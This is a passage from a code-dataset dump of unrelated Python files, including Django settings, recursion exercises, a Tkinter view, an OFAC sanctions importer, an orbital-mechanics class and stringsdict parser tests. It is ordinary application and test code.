stop(self):\n self.runs = False\n","repo_name":"Boritech-Solutions/PyEarthworm","sub_path":"examples/Gsof2Ring/EWMod.py","file_name":"EWMod.py","file_ext":"py","file_size_in_byte":12533,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"52"} +{"seq_id":"29352998834","text":"\"\"\"\nDjango settings for helfeedback project.\n\"\"\"\n\nimport 
os\nimport environ\nimport raven\n\nroot = environ.Path(__file__) - 2 # two steps up, gets parent of this file\n# Build paths inside the project like this: os.path.join(BASE_DIR, ...)\nBASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\n\nenv = environ.Env(\n # Currently added as prefix to session and csrf-cookies\n INSTANCE_NAME=(str, 'helfeedback'),\n # Currently defines *_COOKIE_PATH, do not include leading /\n URL_PREFIX=(str, None),\n # DEBUG creates non-obvious vulnerabilities, keep disabled in production\n DEBUG=(bool, False),\n TRUST_PROXY_SSL=(bool, False),\n TRUST_PROXY_HOST=(bool, False),\n ALLOWED_HOSTS=(list, []),\n ADMINS=(list, []),\n DATABASE_URL=(str, 'postgres:///helfeedback'),\n REDIS_URL=(str, 'redis://localhost:6379/0'),\n MEDIA_ROOT=(environ.Path(), root('media')),\n STATIC_ROOT=(environ.Path(), root('static')),\n MEDIA_URL=(str, '/media/'),\n STATIC_URL=(str, '/static/'),\n SENTRY_DSN=(str, ''),\n SECRET_KEY=(str, ''),\n)\n# read in environment from from \"config_dev.env\"\n# config_dev tries to suggest that the file should only be used\n# in development. Envvars should be used in production to avoid\n# accidents with leftover files\nenviron.Env.read_env('config_dev.env')\n\n\n# Config translation from environment (can be from file)\n\nDEBUG = env('DEBUG')\nALLOWED_HOSTS = env('ALLOWED_HOSTS')\nADMINS = env('ADMINS')\nDATABASES = {\n 'default': env.db(),\n}\n# Celery, first line kept here for closeness\nCELERY_RESULT_BACKEND = 'djcelery.backends.database:DatabaseBackend'\nBROKER_URL = env('REDIS_URL')\nSTATIC_URL = env('STATIC_URL')\nMEDIA_URL = env('MEDIA_URL')\nSTATIC_ROOT = env('STATIC_ROOT')\nMEDIA_ROOT = env('MEDIA_ROOT')\nCSRF_COOKIE_NAME = '{}-csrftoken'.format(env('INSTANCE_NAME'))\nSESSION_COOKIE_NAME = '{}-sessionid'.format(env('INSTANCE_NAME'))\nSESSION_COOKIE_PATH = '/{}'.format(env('URL_PREFIX'))\nif not DEBUG:\n SESSION_COOKIE_SECURE = True\n CSRF_COOKIE_SECURE = True\n# Perhaps combine these two into TRUST_PROXY?\nif env('TRUST_PROXY_SSL'):\n SECURE_PROXY_SSL_HEADER = ('HTTP_X_FORWARDED_PROTO', 'https')\nif env('TRUST_PROXY_HOST'):\n USE_X_FORWARDED_HOST = True\n# INSTALLED_APPS is manipulated below, after defining it\nif env('SENTRY_DSN'):\n RAVEN_CONFIG = {\n 'dsn': env('SENTRY_DSN'),\n 'release': raven.fetch_git_sha(BASE_DIR),\n }\n\n# Django default logging without debug does not output anything\n# to std*, let use log errors and worse. They should end up\n# in the runtime (ie. uwsgi, gunicorn...) 
logs\nLOGGING = {\n 'version': 1,\n 'disable_existing_loggers': False,\n 'handlers': {\n 'console': {\n 'class': 'logging.StreamHandler',\n },\n },\n 'loggers': {\n 'django': {\n 'handlers': ['console'],\n 'level': 'ERROR',\n },\n },\n}\n\n\n# Application definition\n\nINSTALLED_APPS = [\n 'django.contrib.admin',\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.messages',\n 'django.contrib.staticfiles',\n 'rest_framework',\n 'djcelery',\n 'compressor',\n\n # Apps within this repository\n 'feedback'\n]\n\n# Rest of configuration is above together with others\nif env('SENTRY_DSN'):\n INSTALLED_APPS.append('raven.contrib.django.raven_compat')\n\nSTATICFILES_FINDERS = [\n 'django.contrib.staticfiles.finders.FileSystemFinder',\n 'django.contrib.staticfiles.finders.AppDirectoriesFinder',\n 'compressor.finders.CompressorFinder',\n]\n\nSTATICFILES_DIRS = [\n os.path.join(BASE_DIR, \"node_modules/\"),\n]\n\nCOMPRESS_PRECOMPILERS = [\n ('text/x-scss', 'django_libsass.SassCompiler'),\n]\n\nMIDDLEWARE = [\n 'django.middleware.security.SecurityMiddleware',\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.locale.LocaleMiddleware',\n 'django.middleware.common.CommonMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n 'django.middleware.clickjacking.XFrameOptionsMiddleware',\n]\n\nROOT_URLCONF = 'helfeedback.urls'\n\nTEMPLATES = [\n {\n 'BACKEND': 'django.template.backends.django.DjangoTemplates',\n 'DIRS': [],\n 'APP_DIRS': True,\n 'OPTIONS': {\n 'context_processors': [\n 'django.template.context_processors.debug',\n 'django.template.context_processors.request',\n 'django.contrib.auth.context_processors.auth',\n 'django.contrib.messages.context_processors.messages',\n ],\n },\n },\n]\n\nWSGI_APPLICATION = 'helfeedback.wsgi.application'\n\n\n# Password validation\n# https://docs.djangoproject.com/en/1.11/ref/settings/#auth-password-validators\n\nAUTH_PASSWORD_VALIDATORS = [\n {\n 'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',\n },\n {\n 'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',\n },\n {\n 'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',\n },\n {\n 'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',\n },\n]\n\n\n# Internationalization\n# https://docs.djangoproject.com/en/1.11/topics/i18n/\n\nLANGUAGE_CODE = 'fi'\n\nTIME_ZONE = 'Europe/Helsinki'\n\nUSE_I18N = True\n\nUSE_L10N = True\n\nUSE_TZ = True\n\n\n# local_settings.py can be used to override environment-specific settings\n# like database and email that differ between development and production.\nlocal_settings_path = os.path.join(BASE_DIR, \"local_settings.py\")\nif os.path.exists(local_settings_path):\n with open(local_settings_path) as fp:\n code = compile(fp.read(), local_settings_path, 'exec')\n exec(code, globals(), locals())\n\n\n# If a secret key was not supplied from elsewhere, generate a random one\n# and store it into a file called .django_secret.\nif 'SECRET_KEY' not in locals():\n secret_file = os.path.join(BASE_DIR, '.django_secret')\n try:\n SECRET_KEY = open(secret_file).read().strip()\n except IOError:\n import random\n system_random = random.SystemRandom()\n try:\n SECRET_KEY = ''.join([system_random.choice('abcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*(-_=+)') for i in range(64)])\n secret = 
open(secret_file, 'w')\n            os.chmod(secret_file, 0o0600)\n            secret.write(SECRET_KEY)\n            secret.close()\n        except IOError:\n            raise Exception('Please create a %s file with random characters to generate your secret key!' % secret_file)\n","repo_name":"City-of-Helsinki/helfeedback","sub_path":"helfeedback/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":6642,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"20801876111","text":"\ndef max_list_iter(int_list): # must use iteration not recursion\n    \"\"\"finds the max of a list of numbers and returns the value (not the index)\n    If int_list is empty, returns None. If list is None, raises ValueError\"\"\"\n    if int_list is None:\n        raise ValueError\n    elif (len(int_list) == 0):\n        return None\n    else:\n        maxVal = int_list[0]  # seed with the first element instead of a magic sentinel\n        for i in range( len(int_list)):\n            if int_list[i] > maxVal:\n                maxVal = int_list[i]\n        return maxVal\n\ndef reverse_rec(int_list): # must use recursion\n    \"\"\"recursively reverses a list of numbers and returns the reversed list\n    If list is None, raises ValueError\"\"\"\n    if int_list is None:\n        raise ValueError\n    if len(int_list) == 0:\n        return []\n    return [int_list[-1]] + reverse_rec(int_list[:-1])\n\ndef bin_search(target, low, high, int_list): # must use recursion\n    \"\"\"searches for target in int_list[low..high] and returns index if found\n    If target is not found returns None. If list is None, raises ValueError \"\"\"\n\n    if int_list is None:\n        raise ValueError\n\n    middleIdx = low + (high - low) //2\n    if( low> high ):\n        return None\n\n    if int_list[middleIdx] == target:\n        return middleIdx\n    elif target < int_list[middleIdx]: \n        return bin_search(target, low , middleIdx -1, int_list)\n    elif target > int_list[middleIdx] : \n        return bin_search( target, middleIdx+1 , high, int_list)\n    \nlist_val =[0,1,2,3,4,7,9,10 ]\nprint(bin_search(1, 0 , len(list_val)-1, list_val))\nprint(bin_search(1000, 0 , len( list_val)-1, list_val))\n\n# 0 1 2 3 4 5 6 7 9 10\n#","repo_name":"cpe202spring2019/lab1-c0caDJ","sub_path":"lab1.py","file_name":"lab1.py","file_ext":"py","file_size_in_byte":1624,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"123994147","text":"from tkinter import *\r\nfrom MindMedia.DBoperations import fetch_friends, delete_friends\r\nfrom MindMedia.session_handler import current_user\r\nfrom tkinter import font\r\n\r\n\r\nclass ViewFriends(Frame):\r\n    def __init__(self, parent, current_user):\r\n        super(ViewFriends, self).__init__(parent)\r\n        self.current_user = current_user\r\n        self.set_up_view_friends()\r\n\r\n    def set_up_view_friends(self):\r\n        self.lis = fetch_friends(self.current_user)\r\n        # self.friend_names = [fetch_user_name(x[0])[0] for x in self.lis]\r\n        # print(self.friend_names)\r\n        Label(self, text=\"Your friends\", font=font.Font(size=20)).pack()\r\n        self.frames = []\r\n        F=Frame(self)\r\n        F.pack()\r\n        f2 = Frame(F)\r\n        f2.pack(side=LEFT)\r\n        f3 = Frame(F)\r\n        f3.pack(side=LEFT)\r\n        self.frames.append(F)\r\n        for x in range(len(self.lis)):\r\n            Label(f2,text=self.lis[x],font=font.Font(size=14)).pack(fill=X,padx=10,pady=10)\r\n            Button(f3, text=\"unfriend\", font=font.Font(size=12), bg='lightblue',\r\n                   command=self.delete_friend_button_clicked(self.lis[x])).pack(fill=X,padx=10,pady=10)\r\n\r\n    def delete_friend_button_clicked(self, name):\r\n        def action_function():\r\n            delete_friends(self.current_user, name[0])\r\n            self.pack_forget()\r\n        
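# return the closure so Tkinter calls it when the button is clicked\r\n        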
return action_function\r\n\r\n\r\n# root = Tk()\r\n# w = ViewFriends(root,current_user())\r\n# w.pack()\r\n# root.mainloop()\r\n","repo_name":"vasanthrv10/MindMedia","sub_path":"friends_view.py","file_name":"friends_view.py","file_ext":"py","file_size_in_byte":1466,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"8343326718","text":"import os\nimport csv\nimport numpy as np\n\ndef check_trade_book():\n\n    TRADE_BOOK = []\n\n    if os.path.exists('dataFiles/TRADE_BOOK.csv'):\n\n        with open('dataFiles/TRADE_BOOK.csv', 'r') as f:\n            data = csv.reader(f)\n\n            for line in data:\n                array = np.array(line)\n                TRADE_BOOK.append(array.astype(np.float64))\n\n        return TRADE_BOOK \n\n    else:\n        return TRADE_BOOK\n\n\ndef update_trade_data(TRADE_BOOK):\n    # write back to the same file that check_trade_book() reads\n    with open('dataFiles/TRADE_BOOK.csv', 'w', newline='') as f:\n        data_writer = csv.writer(f, delimiter=',',quoting=csv.QUOTE_MINIMAL)\n\n        for line in TRADE_BOOK:\n\n            data_writer.writerow(line)\n\n\n\nTRADE = check_trade_book()\n\ndel TRADE[0]\n\nupdate_trade_data(TRADE)\n","repo_name":"notsofatrabbit/BiananceHiLoBot","sub_path":"CHECK_TRADE_DATA.py","file_name":"CHECK_TRADE_DATA.py","file_ext":"py","file_size_in_byte":794,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"71782553125","text":"# Author: Nathaniel Ruhl\n# This script contains a class that locates r0_hc for an arbitrary orbital model\n# For the algorithm to work, we must a-priori know hc_type\n\nimport numpy as np\n\nimport Modules.tools as tools\nimport Modules.constants as constants\n\n\n# This class locates r0 for both the rising and setting crossing\nclass LocateR0hc:\n    n_step_size = 0.1 # km step size along the line-of-sight (LOS)\n    max_los_dist = 3000 # km, max distance that we look for graze point along the LOS\n\n    def __init__(self, obs_dict, r_array, v_array, t_array):\n        # Unpack inputs\n        self.obs_dict = obs_dict\n        self.hc_type = obs_dict[\"hc_type\"]\n        self.starECI = obs_dict[\"starECI\"]\n        self.crossing_time_range = obs_dict[\"crossing_time_range\"]\n        if obs_dict[\"detector\"] == \"NICER\":\n            self.year0 = 2014\n        elif obs_dict[\"detector\"] == \"RXTE\":\n            self.year0 = 1994\n        self.r_array = r_array\n        self.v_array = v_array\n        self.t_array = t_array\n\n        # derived inputs\n        self.R_orbit, self.h_unit = self.define_R_orbit_h_unit()\n        self.psi = np.rad2deg(\n            (np.pi/2)-np.arccos(np.dot(self.h_unit, self.starECI))) # out-of plane angle (deg)\n\n        # Sequential steps of the algorithm\n        self.A_2d, self.r0_2d = self.get_initial_guess()\n        self.t0_guess_list, self.r0_guess_list = self.get_t0_guess_indices()\n        self.r0_hc, self.t0_model_index, self.graze_point, self.A_3d = self.locate_r0_numerical()\n\n        # Other useful variables\n        self.g_unit = self.graze_point / np.linalg.norm(self.graze_point)\n        self.t0_model = t_array[self.t0_model_index]\n        self.lat_gp, self.lon_gp, alt_gp = tools.eci2geodetic_pymap_vector(self.graze_point, self.t0_model, self.year0)\n        print(f\"TransmitModel: alt_gp={alt_gp} km\")\n\n    def get_initial_guess(self):\n        starECI_proj = tools.proj_on_orbit(self.starECI, self.h_unit)\n        # Use the 2d formulas to guess where r0 may be\n        if self.hc_type == \"rising\":\n            g_unit_proj = np.cross(starECI_proj, self.h_unit)\n        elif self.hc_type == \"setting\":\n            g_unit_proj = np.cross(self.h_unit, starECI_proj)\n\n        A_2d = np.sqrt(self.R_orbit ** 2 - constants.R_EARTH ** 2)\n        r0_2d = constants.R_EARTH * g_unit_proj - A_2d * starECI_proj\n        return 
A_2d, r0_2d\n\n def get_t0_guess_indices(self):\n if self.obs_dict['detector'] == \"RXTE\":\n print(f\"psi = {self.psi}\")\n if abs(self.psi) < 5:\n search_factor = 0.005\n elif abs(self.psi) < 10:\n search_factor = 0.001\n elif abs(self.psi) < 20:\n search_factor = 0.05\n elif abs(self.psi) < 30:\n search_factor = 0.1\n else:\n search_factor = 0.1\n print(\"Out-of plane angle greater than 30 deg. search_factor = 0.1\")\n else:\n # NICER doesn't get very far out-of-plane\n search_factor = 0.005\n # TODO: Improve this algorithm... make a sort of gradient descent to find the tangent point\n r0_guess_indices = np.isclose(self.r_array, self.r0_2d, search_factor)\n\n # 0.5% corresponds to ~15km or more for each component (0.005*3000=15)\n\n t0_guess_list = [] # INDICES in r_array\n\n for index, value in enumerate(r0_guess_indices):\n if all(value) == True:\n t0_guess_list.append(index)\n # get the positions that corresponds to the t0 list\n # t0 indices are for r_array\n r0_guess_list = self.r_array[min(t0_guess_list):max(t0_guess_list)+1]\n\n return t0_guess_list, r0_guess_list\n\n # Line of sight from the predicted satellite position r(t)\n def los_line(self, time_index, n_list):\n if isinstance(n_list, int) or isinstance(n_list, float):\n # n_list is not a list, but a single number\n n = n_list\n return self.r0_guess_list[time_index] + n * self.starECI\n else:\n n_column_vec = n_list.reshape((len(n_list), 1))\n starArray = np.ones((len(n_list), 3)) * self.starECI\n return self.r0_guess_list[time_index] + n_column_vec * starArray\n\n # Locate r0 via aligning the LOS to be tangent to earth\n def locate_r0_numerical(self):\n # Loop through different times, different lines of sight during the crossing\n # print(constants.R_EARTH)\n for time_index, t0_model_index in enumerate(self.t0_guess_list):\n # Lists to check radial altitude at different points along the LOS\n n_list = np.arange(0, LocateR0hc.max_los_dist, LocateR0hc.n_step_size)\n los_points = self.los_line(time_index, n_list) # all points along the LOS\n\n # Lists to check radial altitude at different points along the LOS\n # Pymap3d (tools.py) seems to be buggy right now, so we'll ignore longitude and do it manually\n los_mag_list = np.sqrt(los_points[:, 0] ** 2 + los_points[:, 1] ** 2 + los_points[:, 2] ** 2)\n polar_angles = np.arccos(los_points[:, 2] / los_mag_list) # polar angle at every point along the line of sight\n # Find the radius of earth with the same polar angle as points along the line of sight\n earth_points = tools.point_on_earth_azimuth_polar(np.zeros_like(polar_angles), polar_angles)\n earth_radius_list = np.sqrt(earth_points[:, 0] ** 2 + earth_points[:, 1] ** 2 + earth_points[:, 2] ** 2)\n\n # Identify hc_type (note that this needs to be defined earlier)\n # if time_index == 0:\n # middle_index_los = np.argmin(los_mag_list)\n #\n # if los_mag_list[middle_index_los] < earth_radius_list[middle_index_los]:\n # hc_type = \"rising\"\n # elif los_mag_list[middle_index_los] > earth_radius_list[middle_index_los]:\n # hc_type = \"setting\"\n\n # Check if we reached the tangent grazing point\n # print(np.min(los_mag_list)-np.min(earth_radius_list))\n if self.hc_type == \"rising\":\n if all(los_mag_list >= earth_radius_list):\n # Find the point of closest approach, the tangent point\n n_graze_index = np.argmin(los_mag_list)\n A_3d = n_list[n_graze_index]\n # The 2 below definitions are insightful, but not currently being used\n graze_point = los_points[n_graze_index]\n graze_phi = polar_angles[n_graze_index] # polar angle at 
graze_point\n return self.r0_guess_list[time_index], t0_model_index, graze_point, A_3d\n else:\n continue\n # keep moving through time until the whole LOS is above earth\n elif self.hc_type == \"setting\":\n if any(los_mag_list <= earth_radius_list):\n # Find the point of closest approach, the tangent point\n n_graze_index = np.argmin(los_mag_list)\n A_3d = n_list[n_graze_index]\n # The 2 below definitions are insightful, but not currently being used\n graze_point = los_points[n_graze_index]\n graze_phi = polar_angles[n_graze_index] # polar angle at graze_point\n return self.r0_guess_list[time_index], t0_model_index, graze_point, A_3d\n else:\n # keep moving through time until the whole LOS is above earth\n continue\n\n print('Tangent point not located in specified time range')\n return 0, 0, 0, 0\n\n # Used in HCNM Driver\n def return_r0_data(self):\n return self.t0_model_index, self.lat_gp, self.lon_gp\n\n # Function used to define R_orbit and h_unit at the middle of the crossing time period\n def define_R_orbit_h_unit(self):\n mid_time = (self.crossing_time_range[0]+self.crossing_time_range[1])/2\n mid_time_index = np.where(self.t_array >= mid_time)[0][0]\n R_orbit = np.linalg.norm(self.r_array[mid_time_index])\n h_unit = np.cross(self.r_array[mid_time_index], self.v_array[mid_time_index])\n h_unit = h_unit / np.linalg.norm(h_unit)\n return R_orbit, h_unit\n","repo_name":"nruhl25/HorizonCrossings-project","sub_path":"HCNM2/Old_Code/LocateR0hc.py","file_name":"LocateR0hc.py","file_ext":"py","file_size_in_byte":8308,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"73640574886","text":"import logging\nimport re\nfrom datetime import date\nfrom time import strptime\nfrom typing import Dict, Any, Tuple, Optional\nfrom django.core.exceptions import ValidationError\nfrom django.db import transaction\nfrom django.utils import translation\nfrom django.utils.timezone import now\nfrom django.utils.translation import gettext as _\nfrom jutil.admin import admin_log\nfrom jutil.format import choices_label\nfrom jutil.xml import xml_to_dict\nfrom jsanctions.models import (\n SanctionsListFile,\n SanctionEntity,\n NameAlias,\n SubjectType,\n BirthDate,\n Address,\n Identification,\n Remark,\n)\n\nlogger = logging.getLogger(__name__)\n\nOFAC_LIST_TYPE = \"OFAC\"\n\nOFAC_XML_ARRAY_TAGS = [\"sdnEntry\", \"program\", \"aka\", \"dateOfBirthItem\", \"placeOfBirthItem\", \"address\", \"id\"]\n\n\ndef load_ofac_sanction_list_as_dict(filename: str) -> Dict[str, Any]:\n with open(filename, \"rb\") as fp:\n data: Dict[str, Any] = xml_to_dict(fp.read(), array_tags=OFAC_XML_ARRAY_TAGS)\n return data\n\n\ndef parse_ofac_date(v: str) -> date:\n st = strptime(v, \"%m/%d/%Y\")\n if not st:\n raise ValidationError(_(\"Invalid date value {}\").format(v))\n return date(st.tm_year, st.tm_mon, st.tm_mday)\n\n\ndef parse_ofac_dob(v: str) -> Tuple[Optional[int], Optional[int], Optional[int]]:\n if re.fullmatch(r\"\\d{4}\", v):\n return int(v), None, None\n if re.fullmatch(r\"\\d{1,2}/\\d{1,2}/\\d{4}\", v):\n st = strptime(v, \"%m/%d/%Y\")\n return st.tm_year, st.tm_mon, st.tm_mday\n if re.fullmatch(r\"\\d{1,2} \\w{3} \\d{4}\", v):\n with translation.override(\"en_US\"):\n st = strptime(v, \"%d %b %Y\")\n return st.tm_year, st.tm_mon, st.tm_mday\n return None, None, None\n\n\ndef get_opt_ofac_str(data: Dict[str, Any], key: str) -> str:\n return data.get(key, \"\") or \"\"\n\n\ndef get_ofac_subject_type(data: Dict[str, Any]) -> SubjectType:\n sdn_type = 
data[\"sdnType\"]\n if sdn_type == \"Entity\":\n obj, created = SubjectType.objects.get_or_create(classification_code=SubjectType.ENTERPRISE)\n elif sdn_type == \"Individual\":\n obj, created = SubjectType.objects.get_or_create(classification_code=SubjectType.PERSON)\n elif sdn_type == \"Vessel\":\n obj, created = SubjectType.objects.get_or_create(classification_code=SubjectType.VESSEL)\n elif sdn_type == \"Aircraft\":\n obj, created = SubjectType.objects.get_or_create(classification_code=SubjectType.AIRCRAFT)\n else:\n logger.warning(\"Unknown sdnType: %s\", sdn_type)\n obj, created = SubjectType.objects.get_or_create(classification_code=sdn_type, code=sdn_type)\n assert isinstance(obj, SubjectType)\n if created:\n obj.code = choices_label(SubjectType.CLASSIFICATION_CODES, obj.classification_code)\n obj.save(update_fields=[\"code\"])\n return obj\n\n\ndef parse_ofac_uid(data: Dict[str, Any]) -> int:\n uid = data.get(\"uid\")\n if uid is None:\n raise ValidationError(_(\"UID missing\"))\n return int(uid)\n\n\ndef create_ofac_alias(se: SanctionEntity, **kwargs) -> NameAlias:\n first_name = kwargs.get(\"firstName\") or \"\"\n last_name = kwargs.get(\"lastName\") or \"\"\n uid = parse_ofac_uid(kwargs)\n whole_name = (first_name + \" \" + last_name).strip()\n alias = NameAlias(sanction=se, first_name=first_name, last_name=last_name, whole_name=whole_name, logical_id=uid)\n alias.full_clean()\n alias.save()\n return alias\n\n\ndef create_ofac_dob(se: SanctionEntity, **kwargs) -> BirthDate:\n dob = BirthDate(sanction=se)\n dob.logical_id = parse_ofac_uid(kwargs)\n dob.birth_date_description = kwargs.get(\"dateOfBirth\") or \"\"\n year, month_of_year, day_of_month = parse_ofac_dob(dob.birth_date_description)\n dob.year = year # type: ignore\n dob.month_of_year = month_of_year # type: ignore\n dob.day_of_month = day_of_month # type: ignore\n if year and month_of_year and day_of_month:\n dob.birth_date = date(year, month_of_year, day_of_month)\n dob.full_clean()\n dob.save()\n return dob\n\n\ndef create_ofac_place_of_birth(se: SanctionEntity, **kwargs) -> BirthDate:\n dob = BirthDate.objects.all().filter(sanction=se, place=\"\").order_by(\"id\").first()\n if dob is None:\n dob = BirthDate(sanction=se, logical_id=parse_ofac_uid(kwargs))\n dob.place = get_opt_ofac_str(kwargs, \"placeOfBirth\")\n dob.full_clean()\n dob.save()\n return dob\n\n\ndef create_ofac_address(se: SanctionEntity, **kwargs) -> Address:\n address = Address(sanction=se)\n address.logical_id = parse_ofac_uid(kwargs)\n address.region = get_opt_ofac_str(kwargs, \"stateOrProvince\")\n address.city = get_opt_ofac_str(kwargs, \"city\")\n address.zip_code = get_opt_ofac_str(kwargs, \"postalCode\")\n address.country_description = get_opt_ofac_str(kwargs, \"country\")\n street = \"\"\n for n in range(1, 5):\n k = \"address{}\".format(n)\n if k in kwargs:\n street = street + \"\\n\" + str(kwargs.get(k))\n else:\n break\n address.street = street.strip()\n address.full_clean()\n address.save()\n return address\n\n\ndef create_ofac_id(se: SanctionEntity, **kwargs) -> Identification:\n id_obj = Identification(sanction=se)\n id_obj.logical_id = parse_ofac_uid(kwargs)\n id_obj.number = kwargs.get(\"idNumber\") or \"\"\n id_obj.identification_type_description = kwargs.get(\"idType\") or \"\"\n id_obj.country_description = kwargs.get(\"idCountry\") or \"\"\n id_obj.full_clean()\n id_obj.save()\n return id_obj\n\n\ndef set_ofac_members( # noqa\n se: SanctionEntity,\n data: Dict[str, Any],\n verbose: bool = False,\n padding: int = 0,\n):\n # uid\n 
se.logical_id = parse_ofac_uid(data)\n\n # firstName, lastName\n first_name, last_name = get_opt_ofac_str(data, \"firstName\"), get_opt_ofac_str(data, \"lastName\")\n if first_name or last_name:\n create_ofac_alias(se, **data)\n\n # sdnType\n se.subject_type = get_ofac_subject_type(data)\n\n # remarks\n remarks = data.get(\"remarks\") or \"\"\n if remarks:\n remark_obj = Remark(container=se, text=remarks)\n remark_obj.full_clean()\n remark_obj.save()\n\n # programList\n for program in data.get(\"programList\", {}).get(\"program\", []) or []:\n if program:\n remark_obj = Remark(container=se, text=\"program={}\".format(program))\n remark_obj.full_clean()\n remark_obj.save()\n\n # akaList\n for e_data in data.get(\"akaList\", {}).get(\"aka\", []) or []:\n create_ofac_alias(se, **e_data)\n\n # dateOfBirthList\n for e_data in data.get(\"dateOfBirthList\", {}).get(\"dateOfBirthItem\", []) or []:\n create_ofac_dob(se, **e_data)\n\n # placeOfBirthList\n for e_data in data.get(\"placeOfBirthList\", {}).get(\"placeOfBirthItem\", []) or []:\n create_ofac_place_of_birth(se, **e_data)\n\n # addressList\n for e_data in data.get(\"addressList\", {}).get(\"address\", []) or []:\n create_ofac_address(se, **e_data)\n\n # idList\n for e_data in data.get(\"idList\", {}).get(\"id\", []) or []:\n create_ofac_id(se, **e_data)\n\n se.full_clean()\n se.save()\n if verbose:\n logger.info(\"%sSaved %s\", padding * \" \", se)\n\n\ndef import_ofac_sanctions(source: SanctionsListFile, verbose: bool = False):\n data = load_ofac_sanction_list_as_dict(source.full_path)\n source.generation_date = parse_ofac_date(data[\"publshInformation\"][\"Publish_Date\"])\n\n t0 = now()\n entities_list = data.get(\"sdnEntry\", [])\n for se_data in entities_list:\n assert isinstance(se_data, dict)\n if verbose:\n logger.info(\" sdnEntry uid %s\", se_data.get(\"uid\"))\n with transaction.atomic():\n se = SanctionEntity.objects.create(source=source, data=se_data)\n set_ofac_members(se, se_data, verbose=verbose, padding=4)\n\n source.imported = now()\n source.save()\n msg = \"Imported {} sanction entities from {} in {}\".format(len(entities_list), source.full_path, source.imported - t0)\n logger.info(msg)\n admin_log([source], msg)\n","repo_name":"kajala/django-jsanctions","sub_path":"jsanctions/ofac.py","file_name":"ofac.py","file_ext":"py","file_size_in_byte":7943,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"52"} +{"seq_id":"33641106320","text":"import cStringIO\nimport mock\nimport os\nimport types\nimport unittest\n\nfrom burton import parser\nimport teststringio\n\nclass StringsDictTests(unittest.TestCase):\n sample_strings = \\\n\"\"\"\n\n\n \n Activate %lu Fonts\n \n NSStringLocalizedFormatKey\n %#@variable_0@\n variable_0\n \n NSStringFormatSpecTypeKey\n NSStringPluralRuleType\n NSStringFormatValueTypeKey\n lu\n zero\n Activate %lu Fonts\n one\n Activate %lu Font\n two\n Activate %lu Fonts\n few\n Activate %lu Fonts\n many\n Activate %lu Fonts\n other\n Activate %lu Fonts\n \n \n Deactivate %lu Fonts\n \n NSStringLocalizedFormatKey\n %#@variable_0@\n variable_0\n \n NSStringFormatSpecTypeKey\n NSStringPluralRuleType\n NSStringFormatValueTypeKey\n lu\n zero\n Deactivate %lu Fonts\n one\n Deactivate %lu Font\n two\n Deactivate %lu Fonts\n few\n Deactivate %lu Fonts\n many\n Deactivate %lu Fonts\n other\n Deactivate %lu Fonts\n \n \n \n\n\"\"\"\n\n translated_strings = \\\n\"\"\"\n\n\n \n Activate %lu Fonts\n \n NSStringLocalizedFormatKey\n %#@variable_0@\n variable_0\n \n 
NSStringFormatSpecTypeKey\n NSStringPluralRuleType\n NSStringFormatValueTypeKey\n lu\n zero\n Activate Plural\n one\n Activate Singular\n two\n Activate Plural\n few\n Activate Plural\n many\n Activate Plural\n other\n Activate Plural\n \n \n Deactivate %lu Fonts\n \n NSStringLocalizedFormatKey\n %#@variable_0@\n variable_0\n \n NSStringFormatSpecTypeKey\n NSStringPluralRuleType\n NSStringFormatValueTypeKey\n lu\n zero\n Deactivate Plural\n one\n Deactivate Singular\n two\n Deactivate Plural\n few\n Deactivate Plural\n many\n Deactivate Plural\n other\n Deactivate Plural\n \n \n \n\n\"\"\"\n\n def test_read_file(self):\n extractor = parser.StringsDict()\n dir = os.path.dirname(__file__)\n file = os.path.join(dir, \"test.stringsdict\")\n\n self.assertEquals(\n extractor._read_file(file),\n StringsDictTests.sample_strings\n )\n\n def test_extract_strings_from_filename(self):\n extractor = parser.StringsDict()\n extractor._read_file = mock.Mock(\n return_value = StringsDictTests.sample_strings\n )\n\n strings = extractor.extract_strings_from_filename(\"some_file\")\n\n self.assertEquals(\n strings,\n set([\n u\"Activate %lu Fonts\",\n u\"Activate %lu Font\",\n u\"Deactivate %lu Fonts\",\n u\"Deactivate %lu Font\",\n ])\n )\n\n def test_extract_mapping_from_filename(self):\n extractor = parser.StringsDict()\n extractor._read_file = mock.Mock(\n return_value = StringsDictTests.sample_strings\n )\n\n string_mapping = extractor.extract_mapping_from_filename(\"some_file\")\n\n self.assertEquals(\n string_mapping.string_mapping_dict,\n {\n u\"Activate %lu Fonts\" : \"Activate %lu Fonts\",\n u\"Activate %lu Font\" : \"Activate %lu Font\",\n u\"Deactivate %lu Fonts\" : \"Deactivate %lu Fonts\",\n u\"Deactivate %lu Font\" : u\"Deactivate %lu Font\",\n }\n )\n\n for key, value in string_mapping.string_mapping_dict.iteritems():\n self.assertEquals(type(key), types.UnicodeType)\n self.assertEquals(type(value), types.UnicodeType)\n\n @mock.patch.object(os, \"mkdir\")\n def test_translate(self, mkdir_func):\n file = cStringIO.StringIO()\n translator = parser.StringsDict();\n test_file = teststringio.TestStringIO()\n vcs_class = mock.Mock()\n\n translator._open_file_for_writing = mock.Mock(return_value = test_file)\n translator._read_file = mock.Mock(return_value = StringsDictTests.sample_strings)\n\n self.assertEquals(\n translator.translate(\n \"test.stringsdict\",\n \"Resources\",\n {\n u'Activate %lu 